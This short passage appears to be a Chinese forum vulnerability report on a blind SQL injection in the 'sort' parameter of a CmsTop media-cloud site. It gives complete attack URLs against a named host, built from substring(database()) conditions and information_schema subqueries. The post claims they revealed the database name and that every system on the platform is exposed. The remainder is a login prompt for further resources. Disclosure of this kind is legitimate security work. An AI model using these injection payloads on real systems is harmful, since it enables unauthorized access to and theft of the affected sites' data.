|
http://site.cmstop.cn/link/index/list?type=1&offset=0&limit=50&_=1440172313381&sort=desc,if(substring(database(),1,1)='1',1,(select%201%20from%20information_schema.TABLES))&category=2 可爆出数据库为:cloud_data 进而获取其他数据,就不深入了 媒体云上的系统都会受影响
漏洞证明:访问 http://site.cmstop.cn/link/index/list?type=1&offset=0&limit=50&_=1440172313381&sort=desc,if(1=1,1,1)='1',1,(select%201%20from%20information_schema.TABLES))&category=2和http://site.cmstop.cn/link/index ... 13381&sort=desc,if(1=2,1)='1',1,(select%201%20from%20information_schema.TABLES))&category=2
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|